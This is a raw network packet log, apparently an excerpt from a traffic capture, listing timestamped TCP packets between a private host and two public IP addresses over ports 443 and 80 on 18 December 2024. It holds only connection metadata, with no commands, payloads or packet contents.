Dec 18, 2024 23:06:15.691294909 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.920984983 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.921020985 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.921108961 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.921530008 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.921545029 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:17.295254946 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:17.298120022 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:17.298145056 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:17.822067022 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:17.822135925 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:17.822195053 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:17.822202921 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:17.892939091 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:17.893024921 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:17.893043041 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.014703989 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.014738083 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.014772892 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.014791012 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.014799118 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.042356968 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.042380095 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.042418003 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.042423964 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.042459011 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.042470932 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.042470932 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.063519955 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.063541889 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.063581944 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.063582897 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.063606024 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.063633919 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.063659906 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.088330030 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.088352919 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.088382959 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.088607073 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.209784985 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.209815025 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.209883928 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.209925890 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.209988117 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.225845098 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.225867033 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.225928068 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.225975037 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.241463900 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.241486073 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.241573095 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.241611958 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.256849051 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.256942987 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.276998043 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.277080059 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.291027069 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.291112900 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.389177084 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.389252901 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.402354956 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.402465105 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.413714886 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.413825035 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.424447060 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.424519062 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.434478045 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.434564114 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.447040081 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.447130919 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.456681013 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.456748009 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.466598988 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.466687918 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.476388931 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.476481915 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.488960028 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.489027977 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.498841047 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.498925924 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.508503914 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.508578062 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.581532955 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.581618071 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.587723970 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.587804079 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.594932079 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.595000029 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.603713036 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.603800058 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.610065937 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.610141039 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.616619110 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.616694927 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.622729063 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.622797966 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.630224943 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.630295038 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.636343002 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.636420012 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.641933918 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.641992092 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.645998001 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.646061897 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.649544954 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.649606943 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.653961897 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.654025078 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.657576084 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.657639027 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.663178921 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.663252115 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.666631937 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.666690111 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.671047926 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.671106100 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:18.909442902 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.909452915 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:18.909512043 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.029545069 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.029635906 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.034929991 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.034981966 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.035022020 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.037611961 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.037679911 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.041804075 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.041877985 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.045689106 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.045767069 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.050301075 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.050371885 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.050395012 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.053836107 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.053903103 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.058473110 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.058545113 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.062567949 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.062633038 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.065243959 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.065355062 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.070637941 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.070699930 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.073337078 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.073395014 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.078749895 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.078826904 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.081475973 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.081546068 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.086381912 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.086451054 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.090172052 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.090236902 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.094253063 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.094316006 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.098304987 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.098454952 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.102303028 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.102366924 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.106353045 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.106412888 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.110574961 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.110646009 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.114552021 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.114624977 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.117916107 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.117980003 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.121887922 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.121953011 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.125924110 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.125988007 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.129977942 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.130048990 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.134015083 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.134080887 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.138046026 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.138113976 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.142102003 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.142173052 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.146231890 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.146296978 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.149522066 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.149601936 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.157366991 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.157430887 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.161061049 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.161123037 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.163723946 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.163786888 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.167161942 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.167232990 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.170053005 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.170109034 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.176929951 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.177054882 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.177110910 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.177201986 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.180150032 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.180224895 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.183790922 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.183875084 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.186777115 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.186863899 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.190207958 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.190274000 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.193147898 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.193207026 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.196537971 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.196604967 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.199481964 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.199557066 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.238646984 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.238713980 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.241615057 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.241698027 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.244944096 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.245009899 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.351104021 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.351187944 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.354095936 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.354190111 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.357275963 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.357389927 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.360037088 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.360116005 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.363334894 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.363405943 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.366055012 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.366142988 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.369039059 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.369117975 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.371822119 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.371891022 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.375294924 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.375370979 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.377846956 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.377919912 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.381325006 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.381407976 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.384390116 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.384460926 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.387069941 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.387310028 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.429527998 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.429617882 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.432279110 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.432348967 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.435237885 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.435303926 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.542193890 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.542335033 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.544837952 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.544926882 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.548906088 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.548989058 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.551469088 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.551572084 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.554227114 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.554313898 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.557718039 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.557796001 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.560352087 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.560424089 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.563379049 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.563450098 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.565990925 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.566061974 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.569163084 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.569238901 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.571765900 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.571826935 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.575159073 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.575218916 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.577929974 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.577990055 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.620178938 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.620244980 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.623229980 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.623300076 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.625835896 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.625901937 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.733318090 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.733406067 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.736156940 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.736213923 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.738784075 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.738858938 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.742394924 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.742470026 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.745198965 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.745281935 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.747922897 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.747986078 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.751437902 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.751512051 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.754158974 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.754230976 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.757155895 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.757227898 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.759994984 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.760071039 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.763144016 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.763200998 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.763228893 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.765928984 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.765989065 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.765997887 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.766016006 CET	443	49735	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:19.766055107 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:19.766462088 CET	49735	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:07:27.329993010 CET	49823	80	192.168.2.4	37.1.223.28
Dec 18, 2024 23:07:27.450639963 CET	80	49823	37.1.223.28	192.168.2.4
Dec 18, 2024 23:07:27.450727940 CET	49823	80	192.168.2.4	37.1.223.28
Dec 18, 2024 23:07:27.464201927 CET	49823	80	192.168.2.4	37.1.223.28
Dec 18, 2024 23:07:27.583817005 CET	80	49823	37.1.223.28	192.168.2.4
Dec 18, 2024 23:07:28.749124050 CET	80	49823	37.1.223.28	192.168.2.4
Dec 18, 2024 23:07:28.749330997 CET	80	49823	37.1.223.28	192.168.2.4
Dec 18, 2024 23:07:28.749408960 CET	49823	80	192.168.2.4	37.1.223.28
Dec 18, 2024 23:07:28.753382921 CET	49823	80	192.168.2.4	37.1.223.28
Dec 18, 2024 23:07:28.872998953 CET	80	49823	37.1.223.28	192.168.2.4
Dec 18, 2024 23:07:29.186315060 CET	80	49823	37.1.223.28	192.168.2.4
Dec 18, 2024 23:07:29.234586954 CET	49823	80	192.168.2.4	37.1.223.28
Dec 18, 2024 23:07:29.646867037 CET	49829	443	192.168.2.4	108.181.61.49
Dec 18, 2024 23:07:29.646899939 CET	443	49829	108.181.61.49	192.168.2.4
Dec 18, 2024 23:07:29.646970034 CET	49829	443	192.168.2.4	108.181.61.49
Dec 18, 2024 23:07:29.647416115 CET	49829	443	192.168.2.4	108.181.61.49
Dec 18, 2024 23:07:29.647428989 CET	443	49829	108.181.61.49	192.168.2.4
Dec 18, 2024 23:07:32.074517012 CET	443	49829	108.181.61.49	192.168.2.4
Dec 18, 2024 23:07:32.074624062 CET	49829	443	192.168.2.4	108.181.61.49
Dec 18, 2024 23:07:32.076344013 CET	49829	443	192.168.2.4	108.181.61.49
Dec 18, 2024 23:07:32.076354027 CET	443	49829	108.181.61.49	192.168.2.4
Dec 18, 2024 23:07:32.076770067 CET	443	49829	108.181.61.49	192.168.2.4
Dec 18, 2024 23:07:32.080797911 CET	49829	443	192.168.2.4	108.181.61.49
Dec 18, 2024 23:07:32.123327017 CET	443	49829	108.181.61.49	192.168.2.4
Dec 18, 2024 23:07:32.689706087 CET	443	49829	108.181.61.49	192.168.2.4
Dec 18, 2024 23:07:32.689862013 CET	443	49829	108.181.61.49	192.168.2.4
Dec 18, 2024 23:07:32.689924002 CET	49829	443	192.168.2.4	108.181.61.49
Dec 18, 2024 23:07:32.824549913 CET	49829	443	192.168.2.4	108.181.61.49
Dec 18, 2024 23:07:35.177198887 CET	49823	80	192.168.2.4	37.1.223.28
Dec 18, 2024 23:07:35.296787024 CET	80	49823	37.1.223.28	192.168.2.4
